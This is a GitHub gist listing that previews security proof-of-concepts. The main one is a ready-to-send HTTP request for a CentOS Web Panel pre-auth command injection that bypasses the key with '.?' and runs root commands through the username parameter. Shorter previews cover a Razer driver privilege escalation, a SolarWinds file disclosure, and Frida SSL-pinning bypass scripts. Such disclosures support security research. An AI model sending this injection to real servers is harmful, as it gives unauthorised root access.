Skip to content

Instantly share code, notes, and snippets.


numan türle numanturle

View GitHub Profile
divinepwner /
Created Aug 26, 2021
cwp pre-auth command inj BUT ULTRA RARE case.

This is a very very rare case on CentOS Web Panel. Key value should be set on target CentOS Web Panel. When key value has been set on target, this can be bypassed with ".?" and without key value, commands can be executed on target system via root level privileges.

command injection on username parameter.

GET /admin/index.php?api=test&key=.?&action=xml&username=root;[command_here]%0A HTTP/1.1
Host: target:2087
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
tothi /
Created Aug 22, 2021
Razer USB gadget on Android for Local Privilege Escalation on Windows
# MINIMAL USB gadget setup using CONFIGFS for simulating Razer Gaming HID
# devices for triggering the vulnerable Windows Driver installer
# credits for the Windows Driver install vuln: @j0nh4t
# the script was developed & tested on Android LineageOS 18.1
View m1racles-poc.c
* m1racle-poc: a basic proof of concept for the M1RACLES vulnerability in the Apple M1.
* This program allows you to read and write the state of the s3_5_c15_c10_1 CPU register.
* Please visit for more information.
* Licensed under the MIT license.
0xsha /
Last active Oct 21, 2021
Solarwinds_Orion_LFD local file disclosure PoC for SolarWinds Orion aka door to SuperNova?)
# CVE-2020-10148 (local file disclosure PoC for SolarWinds Orion aka door to SuperNova ? )
# @0xSha
# (C) 2020
# Advisory :
# Mitigation :
# Details :
# C:\inetpub\SolarWinds\bin\OrionWeb.DLL
# According to SolarWinds.Orion.Web.HttpModules
antichown / Golang cross compilation
Last active Nov 7, 2020
Golang cross compilation
View Golang cross compilation
# Reference:
IvanChepurnyi / JIT results
Last active Apr 29, 2021
Benchmark HTTP service
View JIT results
wrk -c 500 -d 30s -t 12 -R 20k -L http://localhost:8888
Running 30s test @ http://localhost:8888
12 threads and 500 connections
Thread calibration: mean lat.: 456.139ms, rate sampling interval: 3485ms
Thread calibration: mean lat.: 458.787ms, rate sampling interval: 3125ms
Thread calibration: mean lat.: 294.161ms, rate sampling interval: 1654ms
Thread calibration: mean lat.: 391.126ms, rate sampling interval: 3123ms
Thread calibration: mean lat.: 325.404ms, rate sampling interval: 2699ms
Thread calibration: mean lat.: 359.069ms, rate sampling interval: 2533ms
Thread calibration: mean lat.: 72.867ms, rate sampling interval: 222ms
eybisi / hooky.js
Created Apr 18, 2020
View hooky.js
// install package with adb install
// do not open application
// use -f force option
// frida -U -f -l del.js
Java.perform(function() {
var ssl = Java.use("k.x$b")
var channel = Java.use("f.e.c.b.g.f.g.a.c")
var Integer = Java.use("java.lang.Integer");
var ArrayList = Java.use("java.util.ArrayList");
var ArrayList = Java.use("java.util.ArrayList");
View gd-gif.php
//php gd-gif.php image.gif gd-image.gif
$gif = imagecreatefromgif($argv[1]);
imagegif($gif, $argv[2]);
SwitHak /
Last active May 24, 2021
BlueTeam CheatSheet * CVE-2020-0601 * crypt32.dll | Last updated: 2020-01-21 1817 UTC

CVE-2020-0601 AKA ChainOfFools OR CurveBall


  • Microsoft disclosed a vulnerability in their monthly Patch Tuesday referenced under CVE-2020-0601.
  • The vulnerability was discovered by the U.S. National Security Agency, anounced today (2020-01-14) in their press conference, followed by a blog post and an official security advisory.
  • The flaw is located in the "CRYPT32.DLL" file under the C:\Windows\System32\ directory.

Vulnerability explanation

  • NSA description:
  • NSA has discovered a critical vulnerability (CVE-2020-0601) affecting Microsoft Windows® cryptographic functionality.
akabe1 / frida_multiple_unpinning.js
Last active Oct 21, 2021
Another Android ssl certificate pinning bypass for various methods
View frida_multiple_unpinning.js
/* Android ssl certificate pinning bypass script for various methods
by Maurizio Siddu
Run with:
frida -U -f [APP_ID] -l frida_multiple_unpinning.js --no-pause
setTimeout(function() {
Java.perform(function () {